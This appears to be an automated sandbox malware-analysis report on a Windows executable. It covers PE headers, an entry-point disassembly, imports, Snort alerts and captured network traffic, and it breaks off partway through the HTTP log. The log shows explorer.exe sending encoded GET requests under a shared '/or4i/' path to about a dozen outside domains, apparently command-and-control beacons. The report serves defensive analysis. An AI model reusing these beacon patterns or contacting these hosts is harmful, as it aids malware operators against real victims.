                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:ced282d9b261d1462772017fe2f6972b

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  sub esp, 00000184h
                                                                                  push ebx
                                                                                  push esi
                                                                                  push edi
                                                                                  xor ebx, ebx
                                                                                  push 00008001h
                                                                                  mov dword ptr [esp+18h], ebx
                                                                                  mov dword ptr [esp+10h], 0040A198h
                                                                                  mov dword ptr [esp+20h], ebx
                                                                                  mov byte ptr [esp+14h], 00000020h
                                                                                  call dword ptr [004080B8h]
                                                                                  call dword ptr [004080BCh]
                                                                                  and eax, BFFFFFFFh
                                                                                  cmp ax, 00000006h
                                                                                  mov dword ptr [0042F42Ch], eax
                                                                                  je 00007F83A4CB5933h
                                                                                  push ebx
                                                                                  call 00007F83A4CB8A96h
                                                                                  cmp eax, ebx
                                                                                  je 00007F83A4CB5929h
                                                                                  push 00000C00h
                                                                                  call eax
                                                                                  mov esi, 004082A0h
                                                                                  push esi
                                                                                  call 00007F83A4CB8A12h
                                                                                  push esi
                                                                                  call dword ptr [004080CCh]
                                                                                  lea esi, dword ptr [esi+eax+01h]
                                                                                  cmp byte ptr [esi], bl
                                                                                  jne 00007F83A4CB590Dh
                                                                                  push 0000000Bh
                                                                                  call 00007F83A4CB8A6Ah
                                                                                  push 00000009h
                                                                                  call 00007F83A4CB8A63h
                                                                                  push 00000007h
                                                                                  mov dword ptr [0042F424h], eax
                                                                                  call 00007F83A4CB8A57h
                                                                                  cmp eax, ebx
                                                                                  je 00007F83A4CB5931h
                                                                                  push 0000001Eh
                                                                                  call eax
                                                                                  test eax, eax
                                                                                  je 00007F83A4CB5929h
                                                                                  or byte ptr [0042F42Fh], 00000040h
                                                                                  push ebp
                                                                                  call dword ptr [00408038h]
                                                                                  push ebx
                                                                                  call dword ptr [00408288h]
                                                                                  mov dword ptr [0042F4F8h], eax
                                                                                  push ebx
                                                                                  lea eax, dword ptr [esp+38h]
                                                                                  push 00000160h
                                                                                  push eax
                                                                                  push ebx
                                                                                  push 00429850h
                                                                                  call dword ptr [0040816Ch]
                                                                                  push 0040A188h

                                                                                  Rich Headers

                                                                                  Programming Language:
                                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                                  Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8544 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x38000 | 0x33b28 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x29c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                                  Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6457 | 0x6600 | False | 0.66823682598 | data | 6.43498570321 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1380 | 0x1400 | False | 0.4625 | data | 5.26100389731 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x25538 | 0x600 | False | 0.463541666667 | data | 4.133728555 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x30000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x38000 | 0x33b28 | 0x33c00 | False | 0.497480751812 | data | 5.28997877298 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                  Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x38310 | 0x10828 | dBase III DBT, version number 0, next free block index 40 | English | United States
RT_ICON | 0x48b38 | 0xba0d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x54548 | 0x94a8 | data | English | United States
RT_ICON | 0x5d9f0 | 0x5488 | data | English | United States
RT_ICON | 0x62e78 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x670a0 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x69648 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x6a6f0 | 0x988 | data | English | United States
RT_ICON | 0x6b078 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_DIALOG | 0x6b4e0 | 0x100 | data | English | United States
RT_DIALOG | 0x6b5e0 | 0x11c | data | English | United States
RT_DIALOG | 0x6b700 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x6b760 | 0x84 | data | English | United States
RT_MANIFEST | 0x6b7e8 | 0x340 | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                                                                  Imports

DLL | Import
ADVAPI32.dll | RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
SHELL32.dll | SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll | IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                                                                  Possible Origin

Language of compilation system | Country where language is spoken
English | United States

                                                                                  Network Behavior

                                                                                  Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/12/21-20:03:21.436414 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49752 | 34.102.136.180 | 192.168.2.4
05/12/21-20:03:32.193681 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49763 | 34.102.136.180 | 192.168.2.4
05/12/21-20:03:48.182682 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49766 | 34.102.136.180 | 192.168.2.4
05/12/21-20:04:04.026160 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49768 | 23.227.38.74 | 192.168.2.4
05/12/21-20:04:09.293071 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49771 | 34.102.136.180 | 192.168.2.4
05/12/21-20:04:31.157010 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49775 | 34.102.136.180 | 192.168.2.4

                                                                                  TCP Packets

                                                                                  UDP Packets

                                                                                  May 12, 2021 20:02:56.233654976 CEST53648018.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:59.364567995 CEST6172153192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:59.423401117 CEST53617218.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:08.425471067 CEST5125553192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:08.482908010 CEST53512558.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:15.367290020 CEST6152253192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:15.565867901 CEST53615228.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:17.725886106 CEST5233753192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:17.826119900 CEST53523378.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:18.362668991 CEST5504653192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:18.554306984 CEST53550468.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:19.165740013 CEST4961253192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:19.229396105 CEST53496128.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:19.479994059 CEST4928553192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:19.545161009 CEST53492858.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:19.681936026 CEST5060153192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:19.739070892 CEST53506018.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:20.341811895 CEST6087553192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:20.403373003 CEST53608758.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:20.950119972 CEST5644853192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:21.008697987 CEST53564488.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:21.196305990 CEST5917253192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:21.256314039 CEST53591728.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:21.501291990 CEST6242053192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:21.549973965 CEST53624208.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:22.291475058 CEST6057953192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:22.351526022 CEST53605798.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:23.481899977 CEST5018353192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:23.544143915 CEST53501838.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:23.963395119 CEST6153153192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:24.012821913 CEST53615318.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:26.447210073 CEST4922853192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:26.510171890 CEST53492288.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:27.032042980 CEST5979453192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:27.093102932 CEST53597948.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:31.948725939 CEST5591653192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:32.012048960 CEST53559168.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:37.212663889 CEST5275253192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:37.294027090 CEST53527528.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:42.467097044 CEST6054253192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:42.628508091 CEST53605428.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:47.937995911 CEST6068953192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:47.999537945 CEST53606898.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:53.199996948 CEST6420653192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:53.347131014 CEST53642068.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:04:03.668735027 CEST5090453192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:04:03.738435030 CEST53509048.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:04:03.935262918 CEST5752553192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:04:04.003670931 CEST53575258.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:04:06.033979893 CEST5381453192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:04:06.099162102 CEST53538148.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:04:09.047368050 CEST5341853192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:04:09.111213923 CEST53534188.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:04:14.310559034 CEST6283353192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:04:14.373636007 CEST53628338.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:04:19.542972088 CEST5926053192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:04:19.890546083 CEST53592608.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:04:25.495456934 CEST4994453192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:04:25.639183998 CEST53499448.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:04:30.903311968 CEST6330053192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:04:30.975553036 CEST53633008.8.8.8192.168.2.4

                                                                                  DNS Queries


                                                                                  DNS Answers


                                                                                  HTTP Request Dependency Graph


                                                                                  HTTP Packets

                                                                                  Session ID: 0, Source IP: 192.168.2.4, Source Port: 49744, Destination IP: 44.227.76.166, Destination Port: 80, Process: C:\Windows\explorer.exe
                                                                                  Timestamp: May 12, 2021 20:03:15.982130051 CEST, kBytes transferred: 1284, Direction: OUT, Data:
                                                                                  GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=br7cblkv9ontd/SiGgT+XZDl5pRbJS2ewUI6yLIzIbkbVffvtcdgNY0Hgbt3ntXhEXSG HTTP/1.1
                                                                                  Host: www.healshameyoga.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Timestamp: May 12, 2021 20:03:16.190001965 CEST, kBytes transferred: 1285, Direction: IN, Data:
                                                                                  HTTP/1.1 307 Temporary Redirect
                                                                                  Server: openresty
                                                                                  Date: Wed, 12 May 2021 18:03:16 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 168
                                                                                  Connection: close
                                                                                  Location: http://healshameyoga.com
                                                                                  X-Frame-Options: sameorigin
                                                                                  Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>


                                                                                  Session ID: 1, Source IP: 192.168.2.4, Source Port: 49752, Destination IP: 34.102.136.180, Destination Port: 80, Process: C:\Windows\explorer.exe
                                                                                  Timestamp: May 12, 2021 20:03:21.298877954 CEST, kBytes transferred: 1643, Direction: OUT, Data:
                                                                                  GET /or4i/?HFQDEL_8=iur2w+iIhsR226mwIbytM77gwZtRr9g6xSmsh16YEl1oNNyvhmb6qr2bTjtOXqdr6kbB&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1
                                                                                  Host: www.rogersbeefarm.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Timestamp: May 12, 2021 20:03:21.436414003 CEST, kBytes transferred: 1673, Direction: IN, Data:
                                                                                  HTTP/1.1 403 Forbidden
                                                                                  Server: openresty
                                                                                  Date: Wed, 12 May 2021 18:03:21 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 275
                                                                                  ETag: "6096ba97-113"
                                                                                  Via: 1.1 google
                                                                                  Connection: close
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                  Session ID: 10, Source IP: 192.168.2.4, Source Port: 49772, Destination IP: 64.190.62.111, Destination Port: 80, Process: C:\Windows\explorer.exe
                                                                                  Timestamp: May 12, 2021 20:04:14.421730995 CEST, kBytes transferred: 6051, Direction: OUT, Data:
                                                                                  GET /or4i/?HFQDEL_8=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QI8r/8KBX8&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1
                                                                                  Host: www.booweats.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Timestamp: May 12, 2021 20:04:14.499639034 CEST, kBytes transferred: 6052, Direction: IN, Data:
                                                                                  HTTP/1.1 302 Found
                                                                                  date: Wed, 12 May 2021 18:04:14 GMT
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  content-length: 0
                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_GR7H1xMTDQhvKsk9JLsRBf15xjVzhUxhlhUt6qvgKB5IoHIpJ3jjYusyTMFbvzyGzakXql8yj22nmafDt8NgEQ==
                                                                                  expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                  cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  pragma: no-cache
                                                                                  last-modified: Wed, 12 May 2021 18:04:14 GMT
                                                                                  location: https://sedo.com/search/details/?partnerid=324561&language=it&domain=booweats.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
                                                                                  x-cache-miss-from: parking-5cc4cbb56f-5qv64
                                                                                  server: NginX
                                                                                  connection: close


                                                                                  Session ID: 11, Source IP: 192.168.2.4, Source Port: 49773, Destination IP: 154.93.81.33, Destination Port: 80, Process: C:\Windows\explorer.exe
                                                                                  Timestamp: May 12, 2021 20:04:20.187233925 CEST, kBytes transferred: 6053, Direction: OUT, Data:
                                                                                  GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=oJz4pJjdv4YVSt0+MmS2FtCA6v4cV0g87aIryYx21PY21L+ds7v/9rK+HMpewy0ytB7Z HTTP/1.1
                                                                                  Host: www.cuntrera.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:


                                                                                  Session ID: 12, Source IP: 192.168.2.4, Source Port: 49775, Destination IP: 34.102.136.180, Destination Port: 80, Process: C:\Windows\explorer.exe
                                                                                  Timestamp: May 12, 2021 20:04:31.017971039 CEST, kBytes transferred: 6060, Direction: OUT, Data:
                                                                                  GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=s0IAE6utMOpEbBTXfVBtMvohtOMhwSGLvfPwlSEa+yA+XVzrnw8OQ7eif0DqkxnFDccR HTTP/1.1
                                                                                  Host: www.changethecompany.net
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
Timestamp: May 12, 2021 20:04:31.157010078 CEST | kBytes transferred: 6060 | Direction: IN | Data:
HTTP/1.1 403 Forbidden
                                                                                  Server: openresty
                                                                                  Date: Wed, 12 May 2021 18:04:31 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 275
                                                                                  ETag: "6096ba97-113"
                                                                                  Via: 1.1 google
                                                                                  Connection: close
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 49757 | Destination IP: 198.54.114.164 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: May 12, 2021 20:03:26.705135107 CEST | kBytes transferred: 2204 | Direction: OUT | Data:
GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=Nfl9li5qPifS0qmI3oGyYt+1WQBc6+s+CWT3m3ZkN/MuRx1xa905Jr26QEss+PYMzBmi HTTP/1.1
                                                                                  Host: www.nowhealthdays.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
Timestamp: May 12, 2021 20:03:26.905880928 CEST | kBytes transferred: 2206 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                  date: Wed, 12 May 2021 18:03:26 GMT
                                                                                  server: Apache
                                                                                  accept-ranges: bytes
                                                                                  transfer-encoding: chunked
                                                                                  content-type: text/html
                                                                                  connection: close
                                                                                  Data Ascii: 2168<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
Timestamp: May 12, 2021 20:03:26.905924082 CEST | kBytes transferred: 2207 | Direction: IN
                                                                                  Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF;
Timestamp: May 12, 2021 20:03:26.905945063 CEST | kBytes transferred: 2208 | Direction: IN
                                                                                  Data Ascii: -align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; } footer a img { border: 0; } .cop
Timestamp: May 12, 2021 20:03:26.905966997 CEST | kBytes transferred: 2210 | Direction: IN
                                                                                  Data Ascii: margin: 0 10px; } .status-reason { display: inline; } } @media (min-width: 992px) { .additional-info { background-image: url(data:ima
Timestamp: May 12, 2021 20:03:26.906058073 CEST | kBytes transferred: 2215 | Direction: IN
                                                                                  Data Ascii: ntainer"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" /> <div


Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49763 | Destination IP: 34.102.136.180 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: May 12, 2021 20:03:32.055988073 CEST | kBytes transferred: 5992 | Direction: OUT | Data:
GET /or4i/?HFQDEL_8=9uknvSs0D9sRUbKPNEJc//q5kM+rT7HBD1bOe0TigX7EwC/pCwMCwQN4ECUA0466XB/p&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1
                                                                                  Host: www.ikeberto.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
Timestamp: May 12, 2021 20:03:32.193681002 CEST | kBytes transferred: 5993 | Direction: IN | Data:
HTTP/1.1 403 Forbidden
                                                                                  Server: openresty
                                                                                  Date: Wed, 12 May 2021 18:03:32 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 275
                                                                                  ETag: "60995c0c-113"
                                                                                  Via: 1.1 google
                                                                                  Connection: close
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49764 | Destination IP: 185.4.135.136 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: May 12, 2021 20:03:37.372333050 CEST | kBytes transferred: 6017 | Direction: OUT | Data:
GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=XZ5egFlM4LuR7juc0UFP6fai+XX2I8SV8Ur1Ieq3oNzW4b+OCSm6ABQPGtFRxJXr06kx HTTP/1.1
                                                                                  Host: www.directflence.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
Timestamp: May 12, 2021 20:03:37.449553967 CEST | kBytes transferred: 6018 | Direction: IN | Data:
HTTP/1.1 301 Moved Permanently
                                                                                  Date: Wed, 12 May 2021 18:03:37 GMT
                                                                                  Server: Apache
                                                                                  Location: https://www.directflence.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=XZ5egFlM4LuR7juc0UFP6fai+XX2I8SV8Ur1Ieq3oNzW4b+OCSm6ABQPGtFRxJXr06kx
                                                                                  Cache-Control: max-age=2592000
                                                                                  Expires: Fri, 11 Jun 2021 18:03:37 GMT
                                                                                  Content-Length: 348
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.directflence.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&amp;HFQDEL_8=XZ5egFlM4LuR7juc0UFP6fai+XX2I8SV8Ur1Ieq3oNzW4b+OCSm6ABQPGtFRxJXr06kx">here</a>.</p></body></html>


Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49765 | Destination IP: 3.16.197.4 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: May 12, 2021 20:03:42.767637014 CEST | kBytes transferred: 6019 | Direction: OUT | Data:
GET /or4i/?HFQDEL_8=kdp3FbqcdOoi47L6CSewezhnIrd3vGjo7ZesdbmmEgh4+nsMxNwHdMyhwqYehAYq5sNV&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1
                                                                                  Host: www.mmgenius.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
Timestamp: May 12, 2021 20:03:42.905261993 CEST | kBytes transferred: 6020 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 12 May 2021 18:03:42 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 153
                                                                                  Connection: close
                                                                                  Server: nginx/1.16.1
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49766 | Destination IP: 34.102.136.180 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: May 12, 2021 20:03:48.045959949 CEST | kBytes transferred: 6020 | Direction: OUT | Data:
GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=+ijMlDuYhuzidrLjkbi+elVKZ7K6phzLRhFwzYI2MHaYrqu+hiZ6wsf57yroxB2MR5WJ HTTP/1.1
                                                                                  Host: www.rainboxs.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
Timestamp: May 12, 2021 20:03:48.182682037 CEST | kBytes transferred: 6021 | Direction: IN | Data:
HTTP/1.1 403 Forbidden
                                                                                  Server: openresty
                                                                                  Date: Wed, 12 May 2021 18:03:48 GMT
